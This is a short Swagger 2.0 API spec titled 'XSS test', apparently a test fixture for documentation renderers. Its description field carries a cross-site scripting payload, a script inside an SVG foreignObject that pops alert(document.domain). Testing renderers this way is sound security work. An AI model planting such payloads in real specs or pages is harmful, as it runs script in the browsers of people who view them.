swagger: "2.0"
info:
  title: "XSS test"
  version: "1.0.0"
  description: |
    <svg><foreignObject><script>alert(document.domain)</script></foreignObject></svg>
paths:
  /x:
    get:
      responses:
        "200": { description: "OK" }
